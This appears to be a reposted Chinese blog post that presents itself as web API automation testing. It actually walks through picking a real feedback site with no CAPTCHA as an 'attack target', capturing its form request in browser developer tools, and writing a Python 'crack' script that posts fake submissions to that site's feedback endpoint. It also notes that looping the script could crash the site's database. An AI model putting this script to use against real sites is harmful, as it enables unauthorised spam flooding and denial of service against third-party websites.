简单的web接口自动化测试

转载

lanqiuying 2018-03-07 00:25:43

文章标签 web 自动化接口测试 python 文章分类 网络安全

简单的web接口自动化测试

1、寻找攻击对象（无验证码的意见反馈网站）

2、收集API信息

使用chorme打开页面

点击F12进入开发者调试模式

填写好后，点击提交按钮

点击NETWORK，找到含有输入参数的一项

3、编写crack脚本

import requests
import json
def test_crack_feedback():
    url_para={
        'taken':'cb4bfc1df93591e5cc4adcd5aed1f28f3558c2e2',
        'referer':'http://www.*****.com/',
        'username':'1111',
        'qq':'2222',
        'content':'11111111',
        }
    post_url='http://www.114la.com/feedback/feedback.php'
    res=requests.post(post_url,data=url_para)
    print(res)
test_crack_feedback();

4、返回值 <Response [200]> 200状态码，即成功了。 5、说明：如果循环运行此程序，则网站这个地方的数据库可能崩溃。本文主要记载学习记录，未产生任何破坏影响，侵权删除。